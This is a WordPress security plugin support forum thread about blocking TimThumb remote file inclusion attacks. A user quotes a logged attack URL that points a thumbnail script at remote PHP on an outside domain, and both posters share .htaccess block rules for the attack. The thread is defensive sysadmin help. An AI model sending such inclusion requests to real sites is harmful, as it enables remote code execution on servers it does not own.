Timthumb protection – new attack type

Home Forums BulletProof Security Free Timthumb protection – new attack type

Tagged: 

This topic contains 1 reply, has 2 voices, and was last updated by  AITpro Admin 5 years, 2 months ago.

Viewing 2 posts - 1 through 2 (of 2 total)
  • Author
    Posts
  • #4306

    Bartek
    Member

    Dear BulletProof Team,

    I’m experiencing new type of Timthumb attack on my website. I think it is not covered in the latest BulletProof Free version.
    Example: ../wp-content/plugins/sam-images/helpers/timthumb/image.php?src=http://flickr.com.hausundgartenshop24.de/parola.php
    The bot is attacking with use of ‘flickr.com’. To protect, I added ‘flickr’ into the .htaccess

    RewriteCond %{QUERY_STRING} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(flickr|blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC,OR]
    RewriteCond %{THE_REQUEST} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(flickr|blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC]

    Thanks for great plugin!!
    Bartek

    #4316

    AITpro Admin
    Keymaster

    The top section of code in the timthumb security filter is a bit older.  We added the HTTP_REFERER condition in a later version of BPS, which is a much better way of blocking any domain/an external Referrer from successfully exploiting timthumb files.  That new condition protects against any external timthumb attack no matter what the originating/external domain name is.  It would already block flickr.  I assume you found the flicker timthumb attack logged in your Security Log, which means that it was successfully blocked/forbidden.

    # TIMTHUMB FORBID RFI and MISC FILE SKIP/BYPASS RULE
    # Only Allow Internal File Requests From Your Website
    # To Allow Additional Websites Access to a File Use [OR] as shown below.
    # RewriteCond %{HTTP_REFERER} ^.*YourWebsite.com.* [OR]
    # RewriteCond %{HTTP_REFERER} ^.*AnotherWebsite.com.*
    RewriteCond %{QUERY_STRING} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC,OR]
    RewriteCond %{THE_REQUEST} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC]
    RewriteRule .* index.php [F,L]
    RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
    RewriteCond %{HTTP_REFERER} ^.*ait-pro.com.*
    RewriteRule . - [S=1]
Viewing 2 posts - 1 through 2 (of 2 total)

You must be logged in to reply to this topic.